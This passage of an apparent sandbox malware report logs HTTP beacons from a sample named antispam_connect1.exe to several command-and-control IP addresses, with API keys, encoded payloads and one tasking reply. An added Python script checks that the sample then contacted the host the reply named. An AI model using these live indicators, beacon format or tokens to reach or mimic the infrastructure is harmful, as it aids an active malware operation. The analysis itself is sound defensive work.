                                            Data Raw: 31 30 39 2e 31 37 32 2e 38 38 2e 33 38 3b 31 32 36 35 38 3b 68 31 56 52 74 58 6f 56 74 67 55 62 70 52 52 34 3a 4b 37 38 2f 67 42 4f 2f 77 48 45 34 6f 4c 39 36 69 35 66 2e 64 66 57 38 6d 32 48 2e 6e 44 4b 32 52 77 4d 33 61 38 44 32 56 78 62 2e 31 4b 65 31 54 62 6c 30 52 71 31 36 38 4c 69 2c 57 6c 7a 68 6d 70 72 74 36 7a 4d 74 46 42 55 70 62 57 37 3a 34 50 44 2f 48 6f 66 2f 37 36 54 34 6f 39 75 36 6c 58 46 2e 35 6c 78 38 32 44 4a 2e 44 64 6e 32 4a 6b 47 33 72 4f 38 36 47 4e 39 2e 52 76 47 36 78 63 45 31 70 35 54 2c 70 78 52 68 49 6f 50 74 44 6c 62 74 63 79 56 70 4c 6a 34 3a 45 39 4f 2f 65 38 62 2f 61 56 6a 39 69 48 41 33 66 56 39 2e 42 79 4a 31 75 4f 69 38 33 68 56 35 39 51 75 2e 62 58 41 31 4c 72 4b 35 61 73 30 39 47 63 69 2e 48 64 48 32 50 48 39 35 46 4b 73 33 70 37 6d 2c 78 46 59 68 78 55 4f 74 68 50 52 74 55 67 69 70 52 71 71 3a 41 59 4e 2f 30 67 57 2f 6a 74 72 39 44 76 52 31 54 52 57 2e 34 6c 54 32 51 68 68 31 6e 72 49 32 39 4f 7a 2e 49 4f 74 31 4c 77 70 36 58 74 41 36 6c 6f 76 2e 67 34 4a 39 4d [TRUNCATED]
                                            Data Ascii: 109.172.88.38;12658;h1VRtXoVtgUbpRR4:K78/gBO/wHE4oL96i5f.dfW8m2H.nDK2RwM3a8D2Vxb.1Ke1Tbl0Rq168Li,Wlzhmprt6zMtFBUpbW7:4PD/Hof/76T4o9u6lXF.5lx82DJ.Ddn2JkG3rO86GN9.RvG6xcE1p5T,pxRhIoPtDlbtcyVpLj4:E9O/e8b/aVj9iHA3fV9.ByJ1uOi83hV59Qu.bXA1LrK5as09Gci.HdH2PH95FKs3p7m,xFYhxUOthPRtUgipRqq:AYN/0gW/jtr9DvR1TRW.4lT2Qhh1nrI29Oz.IOt1Lwp6XtA6lov.g4J9M7Y1aki,BhJhK80tZRJtHjBpPhg:GF8/ws3/gOw1DJJ8ZxG8E4n.kqO1OjZ3ST10pP2.icR2SWD0WT76e1M.C3l2jI04orM3ViS
Oct 14, 2024 17:22:51.459043026 CEST | 6 | OUT | Data Raw: 00
                                            Data Ascii:
Oct 14, 2024 17:23:21.467711926 CEST | 6 | OUT | Data Raw: 00
                                            Data Ascii:
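Session 0 is the one exchange in this report that gets a 200 rather than a 429: the text/plain body starts with "109.172.88.38;12658;", and the TCP table above then shows the sample opening a connection from port 49705 to exactly that host and port. The script below is an added example, not part of the Joe Sandbox report or of the sample. It parses the run-together rows of the TCP table (timestamp, then source port, destination port, source IP and destination IP with no separators, as the page shows them) by enumerating every legal split and keeping the single one consistent with two labelled assumptions: the sandbox host is 192.168.2.5 and its side of each connection uses an ephemeral port. It then splits the 200 OK body into host, port and opaque token groups and checks that the host:port it names was actually contacted. The sample rows and the reply body are copied from this page.

```python
"""Recover structure from this report's flattened TCP table and tie the 200 OK
reply in session 0 to the follow-on connection. Added example, not report or
sample code. Assumptions (not stated by the report): the analysed VM is
192.168.2.5 and it only ever uses ephemeral source ports."""
import re
from collections import defaultdict, namedtuple

LOCAL_IP = "192.168.2.5"   # assumption: the analysed VM's address
EPHEMERAL_MIN = 49152      # assumption: the VM never listens, so its port is ephemeral

# Constructed sample: six rows copied verbatim from the page's flattened table.
PACKET_ROWS = """\
Oct 14, 2024 17:23:11.056602955 CEST804998446.8.232.106192.168.2.5
Oct 14, 2024 17:23:11.056700945 CEST4998480192.168.2.546.8.232.106
Oct 14, 2024 17:23:13.925270081 CEST4999380192.168.2.5188.130.206.243
Oct 14, 2024 17:23:13.930243969 CEST8049993188.130.206.243192.168.2.5
Oct 14, 2024 17:23:17.324306965 CEST4970512658192.168.2.5109.172.88.38
Oct 14, 2024 17:23:17.329317093 CEST1265849705109.172.88.38192.168.2.5
""".splitlines()

# ASCII body of the HTTP/1.1 200 OK from 46.8.232.106 (session 0 on this page).
C2_RESPONSE = (
    "109.172.88.38;12658;"
    "h1VRtXoVtgUbpRR4:K78/gBO/wHE4oL96i5f.dfW8m2H.nDK2RwM3a8D2Vxb.1Ke1Tbl0Rq168Li,"
    "Wlzhmprt6zMtFBUpbW7:4PD/Hof/76T4o9u6lXF.5lx82DJ.Ddn2JkG3rO86GN9.RvG6xcE1p5T,"
    "pxRhIoPtDlbtcyVpLj4:E9O/e8b/aVj9iHA3fV9.ByJ1uOi83hV59Qu.bXA1LrK5as09Gci.HdH2PH95FKs3p7m,"
    "xFYhxUOthPRtUgipRqq:AYN/0gW/jtr9DvR1TRW.4lT2Qhh1nrI29Oz.IOt1Lwp6XtA6lov.g4J9M7Y1aki,"
    "BhJhK80tZRJtHjBpPhg:GF8/ws3/gOw1DJJ8ZxG8E4n.kqO1OjZ3ST10pP2.icR2SWD0WT76e1M.C3l2jI04orM3ViS"
)

TS_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)(?P<tail>[\d.]+)$"
)
Packet = namedtuple("Packet", "ts src sport dst dport")


def _octet_ok(s):
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 255


def _port_ok(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def _split_ips(rest):
    """rest is two dotted quads run together (7 dots); the 4th group is shared."""
    parts = rest.split(".")
    if len(parts) != 7:
        return
    shared = parts[3]
    for k in range(1, len(shared)):
        src, dst = parts[:3] + [shared[:k]], [shared[k:]] + parts[4:]
        if all(map(_octet_ok, src)) and all(map(_octet_ok, dst)):
            yield ".".join(src), ".".join(dst)


def parse_packet(row):
    """Enumerate every split of the digit run into sport|dport|src|dst and keep
    the single split where exactly one endpoint is the sandbox host and that
    side's port is ephemeral. Raises if zero or several splits survive."""
    m = TS_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    tail, found = m["tail"], set()
    for i in range(1, 6):
        for j in range(1, 6):
            sport, dport, rest = tail[:i], tail[i:i + j], tail[i + j:]
            if not (_port_ok(sport) and _port_ok(dport)):
                continue
            for src, dst in _split_ips(rest):
                if (src == LOCAL_IP) == (dst == LOCAL_IP):
                    continue  # neither or both sides local: not a sandbox flow
                local_port = int(sport) if src == LOCAL_IP else int(dport)
                if local_port >= EPHEMERAL_MIN:
                    found.add(Packet(m["ts"], src, int(sport), dst, int(dport)))
    if len(found) != 1:
        raise ValueError(f"{len(found)} parses for row: {row!r}")
    return found.pop()


def remote_endpoints(packets):
    """Remote IP -> set of remote ports the sandbox host exchanged packets with."""
    out = defaultdict(set)
    for p in packets:
        if p.src == LOCAL_IP:
            out[p.dst].add(p.dport)
        else:
            out[p.src].add(p.sport)
    return dict(out)


def parse_c2_response(body):
    """Split the text/plain reply into (host, port, comma-separated token groups).
    Only the first two fields are interpreted; the groups are kept opaque."""
    host, port, blob = body.split(";", 2)
    octets = host.split(".")
    if len(octets) != 4 or not all(map(_octet_ok, octets)) or not _port_ok(port):
        raise ValueError("reply does not start with host;port;")
    return host, int(port), blob.split(",")


def response_was_followed(body, packets):
    """True when the packet log shows traffic to the host:port named in the reply."""
    host, port, _ = parse_c2_response(body)
    return port in remote_endpoints(packets).get(host, set())
```

Running `[parse_packet(r) for r in PACKET_ROWS]` yields the six flows with ports and addresses separated; `remote_endpoints` then reports a single remote port per IP (80 on the HTTP hosts, 12658 on 109.172.88.38), and `response_was_followed(C2_RESPONSE, pkts)` is true because the port-12658 flow matches the first two fields of the reply. The enumerate-and-filter approach is deliberate: a regex alone cannot decide whether "5109" in "192.168.2.5109.172.88.38" splits as 5|109 or 51|09, so the octet, port and local-endpoint constraints do the disambiguation, and a row that still admits several parses is reported rather than guessed.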


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49784 | 46.8.232.106 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 17:22:36.946562052 CEST | 290 | OUT | POST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: IwqMvO4E
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
Oct 14, 2024 17:22:37.610862017 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:37 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49790 | 46.8.236.61 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 17:22:37.634156942 CEST | 289 | OUT | POST / HTTP/1.1
                                            Host: 46.8.236.61
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: gNf5iXCC
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
Oct 14, 2024 17:22:38.384016991 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:38 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49791 | 93.185.159.253 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
Timestamp | Bytes transferred | Direction | Data
Oct 14, 2024 17:22:38.481688976 CEST | 292 | OUT | POST / HTTP/1.1
                                            Host: 93.185.159.253
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: OlvdCeeS
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:39.177650928 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:39 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            4 | 192.168.2.5 | 49797 | 91.212.166.91 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:22:39.199464083 CEST | 291 | OUT | POST / HTTP/1.1
                                            Host: 91.212.166.91
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: G7z8sjLn
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:39.915122986 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:39 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            5 | 192.168.2.5 | 49803 | 188.130.206.243 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:22:39.936436892 CEST | 293 | OUT | POST / HTTP/1.1
                                            Host: 188.130.206.243
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: OEISFmzO
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:41.036286116 CEST | 165 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:40 GMT
                                            Content-Length: 1
                                            Data Raw: 0a
                                            Data Ascii:


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            6 | 192.168.2.5 | 49839 | 46.8.232.106 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:22:45.436721087 CEST | 290 | OUT | POST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: CCittVV6
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:46.197560072 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:46 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            7 | 192.168.2.5 | 49844 | 46.8.236.61 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:22:46.220381021 CEST | 289 | OUT | POST / HTTP/1.1
                                            Host: 46.8.236.61
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: YoIfSmwx
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:46.910882950 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:46 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            8 | 192.168.2.5 | 49849 | 93.185.159.253 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:22:46.933666945 CEST | 292 | OUT | POST / HTTP/1.1
                                            Host: 93.185.159.253
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: StMB7MeO
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:47.658917904 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:47 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            9 | 192.168.2.5 | 49855 | 91.212.166.91 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:22:47.683094025 CEST | 291 | OUT | POST / HTTP/1.1
                                            Host: 91.212.166.91
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: I5zPHURx
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:48.412225962 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:48 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            10 | 192.168.2.5 | 49858 | 188.130.206.243 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:22:48.441749096 CEST | 293 | OUT | POST / HTTP/1.1
                                            Host: 188.130.206.243
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: YESqh4FC
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:22:49.223556995 CEST | 165 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:22:49 GMT
                                            Content-Length: 1
                                            Data Raw: 0a
                                            Data Ascii:


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            11 | 192.168.2.5 | 49984 | 46.8.232.106 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:23:11.056999922 CEST | 290 | OUT | POST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: HT1MJ8n9
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:11.747373104 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:11 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            12 | 192.168.2.5 | 49990 | 46.8.236.61 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:23:11.769184113 CEST | 289 | OUT | POST / HTTP/1.1
                                            Host: 46.8.236.61
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: XmTGYZcU
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:12.469032049 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:12 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


